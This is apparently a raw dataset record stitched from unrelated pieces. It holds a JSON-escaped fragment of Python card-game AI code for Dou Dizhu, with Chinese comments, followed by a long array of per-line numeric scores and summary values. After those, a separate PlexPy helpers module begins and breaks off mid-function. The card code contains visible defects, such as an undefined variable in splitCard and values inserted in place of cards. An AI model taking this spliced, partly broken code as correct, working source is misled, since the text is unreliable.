vector.len()>0:\r\n", " vct = CardVector('')\r\n", " self.getSingleCard(lessCards, vct)\r\n", " threearr = vector.getGreaterThan(minval)\r\n", " if vct.len() > 0 and threearr and len(threearr) > 0:\r\n", " self.copyList(threearr, resultCards)\r\n", " resultCards.append(vct.getFirstVal())\r\n", " elif type == 
DeckType.ThreeAndTwo:\r\n", " lessCards = self.getThreeCard(handCard, vector)\r\n", " if vector.len()>0:\r\n", " vct = CardVector('')\r\n", " self.getTwoCard(lessCards, vct)\r\n", " threearr = vector.getGreaterThan(minval)\r\n", " if vct.len() > 0 and threearr and len(threearr) > 0:\r\n", " self.copyList(threearr,resultCards)\r\n", " self.copyList(vct.getFirstVal(),resultCards)\r\n", " elif type == DeckType.Bomb:\r\n", " pass\r\n", " elif type == DeckType.Shunzi:\r\n", " lessCards = self.getShunCard(handCard, vector)\r\n", " if vector.len()>0:\r\n", " resultCards = self.getMoreThanShunCard(vector.getFirstVal(), minval, cardCount)\r\n", " elif type == DeckType.FourAndTwo:\r\n", " lessCards = self.getBombCard(handCard, vector)\r\n", " tempcard = vector.getGreaterThan(minval)\r\n", " if tempcard:\r\n", " onevct = CardVector('')\r\n", " twovct = CardVector('')\r\n", " lessCards = self.getSingleCard(lessCards, onevct)\r\n", " lessCards = self.getTwoCard(lessCards, twovct)\r\n", " if (onevct.len() > 1 or twovct.len() > 0):\r\n", " self.copyList(tempcard, resultCards)\r\n", " if onevct.len() > 1:\r\n", " self.copyList(onevct.getIndexVal(0), resultCards)\r\n", " self.copyList(onevct.getIndexVal(1), resultCards)\r\n", " else:\r\n", " for i in range(0,2):\r\n", " self.copyList(twovct.getIndexVal(i), resultCards)\r\n", " elif type == DeckType.Liandui:\r\n", " self.getTwoCard(handCard, vector)\r\n", " cnum = cardCount / 2\r\n", " if vector.len() >= cnum:\r\n", " resultCards = self.getMoreThanCardVal(vector, minval, cnum)\r\n", " pass\r\n", " elif type == DeckType.Fly\\\r\n", " or type == DeckType.FlyAndTwo\\\r\n", " or type == DeckType.FlyAndTwoDouble:\r\n", " #处理飞机\r\n", " lessCards = self.getThreeCard(handCard, vector)\r\n", " threevct = vector\r\n", " if threevct.len() > 1:\r\n", " mcount = 0\r\n", " attrVector = None\r\n", " if type == DeckType.FlyAndTwo:\r\n", " attrVector = CardVector('')\r\n", " self.getSingleCard(lessCards, attrVector)\r\n", " mcount = mincount / 
(3+1)\r\n", " elif type == DeckType.FlyAndTwoDouble:\r\n", " attrVector = CardVector('')\r\n", " self.getTwoCard(lessCards, attrVector)\r\n", " mcount = mincount / (3+2)\r\n", " else:\r\n", " mcount = mincount / 3\r\n", "\r\n", " if mcount > 1:\r\n", " threeCards = self.getMoreThanCardVal(threevct, minval, mcount, maxcount)\r\n", " if len(threeCards) > 0 and attrVector and attrVector.len() >= mcount:\r\n", " attrcount = 0\r\n", " tempArr = []\r\n", " attrkeys = attrVector.getKeys()\r\n", " for key in attrkeys:\r\n", " if attrcount == mcount:\r\n", " break\r\n", " self.copyList(attrVector.get(key),tempArr)\r\n", " attrcount = attrcount + 1\r\n", " if (maxcount==0 and attrcount == mcount) or ((maxcount>0 and attrcount >= mcount)):\r\n", " self.copyList(threeCards, resultCards)\r\n", " self.copyList(tempArr, resultCards)\r\n", " else:\r\n", " pass\r\n", "\r\n", " if ignoreBomb:\r\n", " if len(resultCards) == 0:\r\n", " #取炸\r\n", " resultCards = self.outBombCard(handCard)\r\n", " if len(resultCards) == 0:\r\n", " #王炸\r\n", " resultCards = self.outWangBombCard(handCard)\r\n", " return resultCards\r\n", " \r\n", " def outBombCard(self, handCard):\r\n", " bombvct = CardVector('bomb')\r\n", " self.getBombCard(handCard, bombvct)\r\n", " if bombvct.len() > 0:\r\n", " return bombvct.getFirstVal()\r\n", " return []\r\n", "\r\n", " def outWangBombCard(self, handCard):\r\n", " wangvct = CardVector('wang')\r\n", " self.getWangBombCard(handCard, wangvct)\r\n", " if wangvct.len() == 2:\r\n", " return wangvct.getList()\r\n", " return []\r\n", "\r\n", " #以下是拆牌算法\r\n", " def splitCard(self, handCard):\r\n", " \"\"\"拆牌->CardVector\"\"\"\r\n", " vector = CardVector('all')\r\n", " vector.addChild(CardVector('wang'))\r\n", " vector.addChild(CardVector('bomb'))\r\n", " vector.addChild(CardVector('shun'))\r\n", " vector.addChild(CardVector('three'))\r\n", " vector.addChild(CardVector('two'))\r\n", " vector.addChild(CardVector('one'))\r\n", " lastCards = []\r\n", " if len(handCard) == 
2:\r\n", " if handCard[0] == self.__CW1 and handCard[1] == self.__CW2:\r\n", " vector.get('wang').add(val, handCard[0])\r\n", " vector.get('wang').add(val, handCard[1])\r\n", "\r\n", " if len(handCard) > 1:\r\n", " lastCards = self.getUnrelatedCard(handCard, vector)\r\n", " #剩余关联牌\r\n", " lastCards = self.getBombCard(lastCards, vector.get('bomb'))\r\n", " #检查飞机\r\n", " lastCards = self.getFlyCard(lastCards, vector.get('three'))\r\n", " lastCards = self.getShunTwoCard(lastCards, vector.get('two'))\r\n", " lastCards = self.getShunCard(lastCards, vector.get('shun'))\r\n", " lastCards = self.getThreeCard(lastCards, vector.get('three'))\r\n", " lastCards = self.getTwoCard(lastCards, vector.get('two'))\r\n", " lastCards = self.checkSingleAsShun(lastCards, vector.get('shun'))\r\n", " else:\r\n", " lastCards = handCard\r\n", " lastCards = self.getSingleCard(lastCards, vector.get('one'))\r\n", " return vector\r\n", " \r\n", " def addVector(self, vector, val, list):\r\n", " \"\"\"增加到vector集合以wang,bomb,three,two,one分类->void\"\"\"\r\n", " l = len(list)\r\n", " if l > 0 and val >= self.__CW1:\r\n", " vector.get('wang').add(val, list[0])\r\n", " elif l == 4:\r\n", " vector.get('bomb').add(val, list)\r\n", " elif l == 3:\r\n", " vector.get('three').add(val, list)\r\n", " elif l == 2:\r\n", " vector.get('two').add(val, list)\r\n", " elif l == 1:\r\n", " vector.get('one').add(val, list[0])\r\n", " \r\n", " def getUnrelatedCard(self, handCard, vector):\r\n", " \"\"\"取出无关联的牌,返回剩余关联牌\\n@vector:是wang,bomb,shun等的集合->[]\"\"\"\r\n", " arr = []\r\n", " lastCards = []\r\n", " eqVal = 0\r\n", " count = len(handCard)\r\n", " if count < 2:\r\n", " return handCard\r\n", "\r\n", " for i in range(0, count):\r\n", " card = handCard[i]\r\n", " val = self.getCardSize(card)\r\n", " if i == 0:\r\n", " arr.append(card)\r\n", " continue\r\n", " precard = handCard[i-1]\r\n", " preval = self.getCardSize(precard)\r\n", "\r\n", " if val == preval:\r\n", " arr.append(card)\r\n", " else:\r\n", " 
#之间是否有联系\r\n", " if preval >= self.__C2 or ((eqVal==0 or eqVal != preval-1) and (val==self.__C2 or preval < val-1)):\r\n", " self.addVector(vector, preval, arr)\r\n", " else:\r\n", " self.copyList(arr, lastCards)\r\n", "\r\n", " arr=[]\r\n", " eqVal = preval\r\n", " arr.append(card)\r\n", " #结尾\r\n", " if i == count-1:\r\n", " if val >= self.__C2 or eqVal < val-1:\r\n", " if (val == self.__CW1 or (preval < self.__CW1 and val == self.__CW2)):\r\n", " #单张大小王\r\n", " vector.get('one').add(val, card)\r\n", " else:\r\n", " self.addVector(vector, val, arr)\r\n", " else:\r\n", " self.copyList(arr, lastCards)\r\n", " return lastCards\r\n", " \r\n", "\r\n", "\r\n", " #以下是取牌组逻辑\r\n", " def getShunCard(self, handCard, vector):\r\n", " \"\"\"取出顺子,返回剩余牌->[]\"\"\"\r\n", " lastCards = []\r\n", " count = len(handCard)\r\n", " if count < 2:\r\n", " return handCard\r\n", " arr = []\r\n", " arrignore = []\r\n", " arrlog = []\r\n", " for i in range(0, count):\r\n", " card = handCard[i]\r\n", " if i == 0:\r\n", " arr.append(card)\r\n", " arrlog.append(card)\r\n", " continue\r\n", " precard = handCard[i-1]\r\n", " preval = self.getCardSize(precard)\r\n", " val = self.getCardSize(card)\r\n", " if preval == val-1 and val < self.__C2:\r\n", " arr.append(card)\r\n", " arrlog.append(card)\r\n", " elif preval == val:\r\n", " arrignore.append(card)\r\n", " arrlog.append(card)\r\n", " else:\r\n", " if len(arr) >= 5:\r\n", " vector.add(self.getCardSize(arr[0]), arr)\r\n", " self.copyList(arrignore, lastCards)\r\n", " else:\r\n", " self.copyList(arrlog, lastCards)\r\n", " arr = []\r\n", " arr.append(card)\r\n", " arrlog = []\r\n", " arrlog.append(card)\r\n", " arrignore = []\r\n", "\r\n", " if i == count-1:\r\n", " if len(arr) >= 5:\r\n", " vector.add(self.getCardSize(arr[0]), arr)\r\n", " self.copyList(arrignore, lastCards)\r\n", " arrignore = []\r\n", " else:\r\n", " self.copyList(arrlog, lastCards)\r\n", " return lastCards\r\n", " \r\n", " def getMoreThanShunCard(self, cards, minval, mincount, 
maxcount=0):\r\n", " \"\"\"从顺子cards对象中获取顺子大于minval的牌->[]\\n@cards:手上的牌,\\n@minval:最小牌面,\\n@mincount:顺子个数,\\n@maxcount:0时固定匹配\"\"\"\r\n", " result = []\r\n", " length = len(result)\r\n", " for card in cards:\r\n", " val = self.getCardSize(card)\r\n", " if val > minval and val < self.__C2\\\r\n", " and ((maxcount==0 and length < mincount)\\\r\n", " or(maxcount > 0 and length < maxcount-1)):\r\n", " result.append(card)\r\n", " if (maxcount == 0 and len(result) == mincount)\\\r\n", " or(maxcount > 0 and len(result) >= mincount) :\r\n", " return result\r\n", " return []\r\n", " \r\n", " def getWangBombCard(self, handCard, vector):\r\n", " \"\"\"取出王炸牌至vector对象,返回剩余牌->[]\"\"\"\r\n", " arr = []\r\n", " temp = []\r\n", " count = len(handCard)\r\n", " for i in range(0, count):\r\n", " card = handCard[i]\r\n", " val = self.getCardSize(card)\r\n", " if val == self.__CW1 or val == self.__CW2:\r\n", " temp.append(card)\r\n", " else:\r\n", " arr.append(card)\r\n", " if len(temp) == 2:\r\n", " for card in temp:\r\n", " vector.add(self.getCardSize(card), card)\r\n", " else:\r\n", " self.copyList(temp, arr)\r\n", " return arr\r\n", " \r\n", " def getBombCard(self, handCard, vector):\r\n", " \"\"\"取出炸至vector对象,返回剩余牌->[]\"\"\"\r\n", " return self.getSameCard(handCard, 4, vector)\r\n", " \r\n", " def getFlyCard(self, handCard, vector):\r\n", " \"\"\"取出飞机至vector对象,返回剩余牌->[]\"\"\"\r\n", " if len(handCard) > 5:\r\n", " threevct = CardVector('')\r\n", " self.getThreeCard(handCard, threevct)\r\n", " if threevct.len() > 1:\r\n", " arr = self.getMoreThanCardVal(threevct, 0, 2, 20)\r\n", " self.getSameCard(arr, 3, vector)\r\n", " for card in arr:\r\n", " handCard.remove(card)\r\n", " return handCard;\r\n", "\r\n", " def getShunTwoCard(self, handCard, vector):\r\n", " \"\"\"取出大于3连对至vector对象,返回剩余牌->[]\"\"\"\r\n", " if len(handCard) > 6:\r\n", " twovct = CardVector('')\r\n", " self.getTwoCard(handCard, twovct)\r\n", " if twovct.len() > 3:\r\n", " arr = self.getMoreThanCardVal(twovct, 0, 4, 
20)\r\n", " self.getSameCard(arr, 2, vector)\r\n", " for card in arr:\r\n", " handCard.remove(card)\r\n", " return handCard;\r\n", "\r\n", " def getThreeCard(self, handCard, vector):\r\n", " \"\"\"取出3条至vector对象,返回剩余牌->[]\"\"\"\r\n", " return self.getSameCard(handCard, 3, vector)\r\n", " \r\n", " def getTwoCard(self, handCard, vector, matchThree=False):\r\n", " \"\"\"取出对子至vector对象,返回剩余牌->[]\\n@matchThree:是否匹配三张\"\"\"\r\n", " lastCards = self.getSameCard(handCard, 2, vector)\r\n", " if matchThree:\r\n", " threevct = CardVector('')\r\n", " lastCards = self.getSameCard(handCard, 3, threevct)\r\n", " if threevct.len() > 0:\r\n", " keys = threevct.getKeys()\r\n", " for key in keys:\r\n", " val = threevct.get(key)\r\n", " arr = []\r\n", " self.copyList(val, arr, 0, 2)\r\n", " vector.add(key, arr)\r\n", " return lastCards\r\n", " \r\n", " def getMoreThanCardVal(self, vector, minval, mincount, maxcount=0):\r\n", " \"\"\"从vector对象取出大于minval的连续牌列表->[]\\n@vector:vector对象,\\n@minval:牌面值,\\n@mincount:匹配个数,\\n@maxcount:0时固定匹配\"\"\"\r\n", " arr = []\r\n", " resultCards = []\r\n", " keys = vector.getKeys()\r\n", " for i in range(0, len(keys)):\r\n", " key = keys[i]\r\n", " if i == 0 and key > minval and key < self.__C2:\r\n", " arr.append(key)\r\n", " elif key > minval:\r\n", " prekey = keys[i-1]\r\n", " if prekey == key-1 and key < self.__C2:\r\n", " arr.append(key)\r\n", " if maxcount==0 and len(arr) == mincount:\r\n", " break\r\n", " else:\r\n", " if len(arr) >= mincount:\r\n", " break\r\n", " else:\r\n", " arr = []\r\n", " arr.append(key)\r\n", " length = len(arr)\r\n", " if length >= mincount:\r\n", " for i in range(0, length):\r\n", " if (maxcount==0 and i == mincount) or (maxcount > 0 and i >= maxcount-1):\r\n", " break\r\n", " val = arr[i]\r\n", " self.copyList(vector.get(val), resultCards)\r\n", " return resultCards\r\n", "\r\n", " def checkSingleAsShun(self, handCard, vector):\r\n", " \"\"\"检查单牌是否可加到顺子中,返回剩余牌->[]\"\"\"\r\n", " shunvct = vector\r\n", " keys = 
shunvct.getKeys()\r\n", " if len(keys) == 0:\r\n", " return handCard;\r\n", " lastCards = []\r\n", " for card in handCard:\r\n", " suc = False\r\n", " for key in keys:\r\n", " items = shunvct.get(key)\r\n", " if len(items) == 0:\r\n", " continue\r\n", " min = self.getCardSize(items[0])\r\n", " max = self.getCardSize(items[len(items)-1])\r\n", " val = self.getCardSize(card)\r\n", " if val == min-1:\r\n", " items.insert(0, val)\r\n", " suc = True\r\n", " break\r\n", " elif val == max+1:\r\n", " items.append(val)\r\n", " suc = True\r\n", " break\r\n", " if not suc:\r\n", " lastCards.append(card)\r\n", " return lastCards\r\n", " \r\n", " def convertVerctor(self, handCard, vector):\r\n", " \"\"\"将牌转至vector对象->void\"\"\"\r\n", " for card in handCard:\r\n", " vector.add(self.getCardSize(card), card)\r\n", "\r\n", " def getSingleCard(self, handCard, vector):\r\n", " \"\"\"取出单牌至vector对象,返回剩余牌->[]\"\"\"\r\n", " return self.getSameCard(handCard, 1, vector)\r\n", " \r\n", " \r\n", " def getSameCard(self, handCard, num, vector):\r\n", " \"\"\"取相同的牌,返回剩余牌\\n@num:相同的个数->[]\"\"\"\r\n", " lastCards = []\r\n", " arr = []\r\n", " count = len(handCard)\r\n", " if count < 2:\r\n", " if count > 0 and num == 1:\r\n", " card = handCard[0]\r\n", " vector.add(self.getCardSize(card), card)\r\n", " return arr;\r\n", " else:\r\n", " return handCard\r\n", " for i in range(0, count):\r\n", " card = handCard[i]\r\n", " if i == 0:\r\n", " arr.append(card)\r\n", " continue\r\n", " precard = handCard[i-1]\r\n", " val = self.getCardSize(card)\r\n", " preval = self.getCardSize(precard)\r\n", " if val == preval:\r\n", " arr.append(card)\r\n", " else:\r\n", " if len(arr) == num:\r\n", " if num == 1:\r\n", " vector.add(preval, arr[0])\r\n", " else:\r\n", " vector.add(preval, arr)\r\n", " else:\r\n", " self.copyList(arr, lastCards)\r\n", " arr = []\r\n", " arr.append(card)\r\n", "\r\n", " if count-1 == i:\r\n", " if len(arr) == num:\r\n", " if num == 1:\r\n", " vector.add(val, arr[0])\r\n", " else:\r\n", 
" vector.add(val, arr)\r\n", " else:\r\n", " self.copyList(arr, lastCards)\r\n", " return lastCards\r\n", "\r\n", " def getCard(self, handCard, cardVal, vector):\r\n", " \"\"\"取出指定大小的牌至vector对象,返回剩余牌->[]\\n@cardId:搜索指定牌大小\"\"\"\r\n", " arr = []\r\n", " count = len(handCard)\r\n", " for i in range(0, count):\r\n", " card = handCard[i]\r\n", " val = self.getCardSize(card)\r\n", " if val == cardVal:\r\n", " vector.add(val, card)\r\n", " else:\r\n", " arr.append(card)\r\n", " return arr\r\n", " \r\n", " def getCardHandleTimes(self, handCard):\r\n", " \"\"\"计算出牌手数->int\"\"\"\r\n", " vector = self.splitCard(handCard)\r\n", " return self.getVectorHandleTimes(vector)\r\n", "\r\n", " def getVectorHandleTimes(self, vector):\r\n", " \"\"\"计算出牌手数->int\\n@vector:拆牌后的vector对象\"\"\"\r\n", " times = 0\r\n", " if vector.get('wang').len() > 0:\r\n", " times = times + 1\r\n", " bombLen = vector.get('bomb').len()\r\n", " if bombLen > 0:\r\n", " times = times + bombLen #四带2\r\n", " times = times + vector.get('shun').len()\r\n", " threeLen = vector.get('three').len()\r\n", " if threeLen > 0:\r\n", " times = times + threeLen\r\n", " twoLen = vector.get('two').len()\r\n", " if twoLen > 0:\r\n", " times = times + twoLen\r\n", " oneLen = vector.get('one').len()\r\n", " if oneLen > 0:\r\n", " times = times + oneLen\r\n", " times = times - threeLen * 1\r\n", " return times\r\n", "\r\n", " def getSingleCount(self, vector):\r\n", " \"\"\"计算单牌数->int\"\"\"\r\n", " return vector.get('one').len()\r\n", " \r\n", " def getTwoCount(self, vector):\r\n", " \"\"\"计算对牌数->int\"\"\"\r\n", " return vector.get('two').len()" ]
[ 0.041666666666666664, 0, 0.02127659574468085, 0, 0, 0, 0.022727272727272728, 0.023809523809523808, 0.02631578947368421, 0.02127659574468085, 0.022727272727272728, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1, 0, 0.024390243902439025, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0, 0.16666666666666666, 0, 0.1297016861219196, 0.07722007722007722, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07407407407407407, 0, 0, 0.06060606060606061, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0.013333333333333334, 0.02127659574468085, 0.02127659574468085, 0, 0, 0, 0, 0.01639344262295082, 0.01639344262295082, 0.024096385542168676, 0, 0.025, 0, 0, 0, 0, 0, 0, 0, 0, 0.05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0.02564102564102564, 0.06451612903225806, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.017857142857142856, 0, 0.02, 0.02, 0, 0, 0, 0, 0.009433962264150943, 0, 0, 0, 0, 0, 0, 0.0392156862745098, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0, 0.031578947368421054, 0.02247191011235955, 0.037037037037037035, 0.03333333333333333, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0.02564102564102564, 0.01834862385321101, 0.039603960396039604, 0.03333333333333333, 0, 0, 0, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0, 0, 0.042105263157894736, 0.02631578947368421, 0, 0, 0.031496062992125984, 0.020833333333333332, 0, 0, 0, 0, 0, 0, 0, 0.01639344262295082, 0, 0, 0.058823529411764705, 0, 0, 0, 0, 0, 0.043478260869565216, 0, 0.023809523809523808, 0.04, 0, 0, 0.03571428571428571, 
0.012048192771084338, 0, 0.04, 0, 0, 0.04, 0.013888888888888888, 0.02857142857142857, 0, 0, 0, 0.022222222222222223, 0.04, 0, 0.014598540145985401, 0.03571428571428571, 0.012048192771084338, 0, 0.011904761904761904, 0.020202020202020204, 0.020618556701030927, 0.034482758620689655, 0, 0.04, 0, 0, 0.030303030303030304, 0.012048192771084338, 0.04, 0, 0, 0.013333333333333334, 0.03571428571428571, 0.012048192771084338, 0, 0.011904761904761904, 0.020202020202020204, 0.020618556701030927, 0.034482758620689655, 0, 0.04, 0, 0, 0, 0.16666666666666666, 0, 0.014705882352941176, 0.023809523809523808, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0.02564102564102564, 0.02564102564102564, 0.05555555555555555, 0, 0, 0, 0, 0, 0, 0, 0, 0.01694915254237288, 0.02857142857142857, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0.058823529411764705, 0, 0, 0.047619047619047616, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0.010101010101010102, 0.01, 0.010101010101010102, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0, 0, 0.02631578947368421, 0.030303030303030304, 0, 0.02857142857142857, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0.06666666666666667, 0, 0, 0, 0, 0.058823529411764705, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.058823529411764705, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.014705882352941176, 0.05405405405405406, 0, 0.16666666666666666, 0, 0.009345794392523364, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0.011904761904761904, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0.023809523809523808, 0, 0, 0, 0.011235955056179775, 0, 0, 0.02, 0.05263157894736842, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0.010638297872340425, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0.013888888888888888, 0, 0.027522935779816515, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0, 0.011764705882352941, 0, 0, 0, 0, 0.043478260869565216, 0, 0, 0.058823529411764705, 0, 0, 0.058823529411764705, 0, 0, 0, 0, 0, 0.05263157894736842, 0.024390243902439025, 0, 0, 0.03125, 0.013513513513513514, 0, 0, 0.027777777777777776, 0.01282051282051282, 0, 0, 0, 0, 0.03125, 0.013513513513513514, 0, 0, 0.03125, 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0, 0, 0, 0, 0.017543859649122806, 0.015151515151515152, 0, 0, 0, 0, 0.03125, 0.020833333333333332, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0, 0, 0.013157894736842105, 0, 0, 0, 0.02, 0.05263157894736842, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010638297872340425, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0.013888888888888888, 0, 0.027522935779816515, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0.047619047619047616, 0, 0, 0.1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05, 0, 0.05263157894736842, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0.043478260869565216, 0, 0, 0.045454545454545456, 0, 0.045454545454545456, 0, 0.045454545454545456, 0, 0.045454545454545456, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0.02564102564102564, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0.058823529411764705, 0, 0, 0.010869565217391304, 0.03125, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0.13333333333333333, 0.021739130434782608, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0.009174311926605505, 0, 0, 0, 0, 0, 0.034482758620689655, 0.05, 0, 0, 0.05, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 
0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0.008849557522123894, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016129032258064516, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02197802197802198, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0, 0, 0, 0.0196078431372549, 0.016129032258064516, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0.07692307692307693, 0.09090909090909091, 0.0196078431372549, 0, 0, 0, 0, 0, 0, 0, 0, 0.034482758620689655, 0, 0.03125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0.02631578947368421 ]
1,133
0.008726
false
# This file is part of PlexPy. # # PlexPy is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # PlexPy is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with PlexPy. If not, see <http://www.gnu.org/licenses/>. from operator import itemgetter from xml.dom import minidom import unicodedata import plexpy import datetime import fnmatch import shutil import time import sys import re import os import json import xmltodict import math def multikeysort(items, columns): comparers = [((itemgetter(col[1:].strip()), -1) if col.startswith('-') else (itemgetter(col.strip()), 1)) for col in columns] def comparer(left, right): for fn, mult in comparers: result = cmp(fn(left), fn(right)) if result: return mult * result else: return 0 return sorted(items, cmp=comparer) def checked(variable): if variable: return 'Checked' else: return '' def radio(variable, pos): if variable == pos: return 'Checked' else: return '' def latinToAscii(unicrap): """ From couch potato """ xlate = { 0xc0: 'A', 0xc1: 'A', 0xc2: 'A', 0xc3: 'A', 0xc4: 'A', 0xc5: 'A', 0xc6: 'Ae', 0xc7: 'C', 0xc8: 'E', 0xc9: 'E', 0xca: 'E', 0xcb: 'E', 0x86: 'e', 0xcc: 'I', 0xcd: 'I', 0xce: 'I', 0xcf: 'I', 0xd0: 'Th', 0xd1: 'N', 0xd2: 'O', 0xd3: 'O', 0xd4: 'O', 0xd5: 'O', 0xd6: 'O', 0xd8: 'O', 0xd9: 'U', 0xda: 'U', 0xdb: 'U', 0xdc: 'U', 0xdd: 'Y', 0xde: 'th', 0xdf: 'ss', 0xe0: 'a', 0xe1: 'a', 0xe2: 'a', 0xe3: 'a', 0xe4: 'a', 0xe5: 'a', 0xe6: 'ae', 0xe7: 'c', 0xe8: 'e', 0xe9: 'e', 0xea: 'e', 0xeb: 'e', 0x0259: 'e', 0xec: 'i', 0xed: 'i', 0xee: 'i', 0xef: 'i', 0xf0: 'th', 0xf1: 'n', 0xf2: 'o', 0xf3: 
'o', 0xf4: 'o', 0xf5: 'o', 0xf6: 'o', 0xf8: 'o', 0xf9: 'u', 0xfa: 'u', 0xfb: 'u', 0xfc: 'u', 0xfd: 'y', 0xfe: 'th', 0xff: 'y', 0xa1: '!', 0xa2: '{cent}', 0xa3: '{pound}', 0xa4: '{currency}', 0xa5: '{yen}', 0xa6: '|', 0xa7: '{section}', 0xa8: '{umlaut}', 0xa9: '{C}', 0xaa: '{^a}', 0xab: '&lt;&lt;', 0xac: '{not}', 0xad: '-', 0xae: '{R}', 0xaf: '_', 0xb0: '{degrees}', 0xb1: '{+/-}', 0xb2: '{^2}', 0xb3: '{^3}', 0xb4: "'", 0xb5: '{micro}', 0xb6: '{paragraph}', 0xb7: '*', 0xb8: '{cedilla}', 0xb9: '{^1}', 0xba: '{^o}', 0xbb: '&gt;&gt;', 0xbc: '{1/4}', 0xbd: '{1/2}', 0xbe: '{3/4}', 0xbf: '?', 0xd7: '*', 0xf7: '/' } r = '' if unicrap: for i in unicrap: if ord(i) in xlate: r += xlate[ord(i)] elif ord(i) >= 0x80: pass else: r += str(i) return r def convert_milliseconds(ms): seconds = ms / 1000 gmtime = time.gmtime(seconds) if seconds > 3600: minutes = 